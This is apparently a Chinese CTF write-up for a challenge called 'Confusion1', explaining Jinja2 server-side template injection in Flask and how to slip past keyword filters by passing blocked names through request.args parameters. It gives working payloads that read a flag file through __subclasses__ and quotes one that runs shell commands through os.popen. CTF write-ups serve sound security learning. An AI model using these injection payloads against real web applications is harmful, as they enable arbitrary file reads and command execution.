Confusion1
知识点
通过request.args.[key]来绕过关键字限制
在python的flask中的框架,可以通过request.args.get['key']来获取url中的get参数,类似于php中$_GET['key'] ,在进行python模板注入时,我们可以利用这个性质来绕过关键字的书写
json
json是字符串类型,但是形式像python中的字典类型,主要作用在于,json是字符串就方便在各种编程语言中传输,并且方便转换成对象,数组等。
思路
进去题目页面,先f12没有提示,再然后只能发现只有index.php有回显,login.php和register.php都是回显404,我们这时f12可以看到提示 :/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt ,这应该是flag的位置,我们要去读取这个文件,这时我用dirsearch扫一下,发现payload都可以回显200,但是都只是回显一个弹框(只是内容不同),没有回显具体内容,抓包看响应头和请求头也没发现,然后就不知道怎么办。
看了wp说有python模板注入,傻了我,于是我用bp中的scanner模块扫一下,发现果然存在模板注入,并且告诉我是jinja2的模板引擎,那么就是python模板注入,估计是flask,于是开始注入
构造http://220.249.52.133:50097/{{2*2}}
回显The requested URL /4 was not found on this server.
那么我们就可以照着这个形式注入
构造http://220.249.52.133:50097/{{''.__class__}}
这时候回显了一个弹框,为什么呢,可能是存在过滤,过滤了url中的path,那么参数呢?
我们用request.args.key来试着利用参数进行绕过
构造http://220.249.52.133:50097/{{''[request.args.a]}}?a=__class__
回显The requested URL /<type 'str'> was not found on this server.
说明这里我们成功进行了绕过,接下来照着这个思路继续尝试,发现还过滤了mro,subclasses,read,我们照样利用参数进行绕过,注意[request.args.a][request.args.b] 之间相当于有个字符连接符,并且[request.args.a]()?a=read 注意a不是等于read(),不然会返回500。
构造payload:{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read
得到flag
我试着根据http://220.249.52.133:47213/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}
利用参数绕过,来得到flag
但是在尝试过程中发现globals被过滤了。不管在path中还是参数中都过滤了,不知道怎么绕过,就放弃了用第二种方法。。可能大佬知道怎么绕过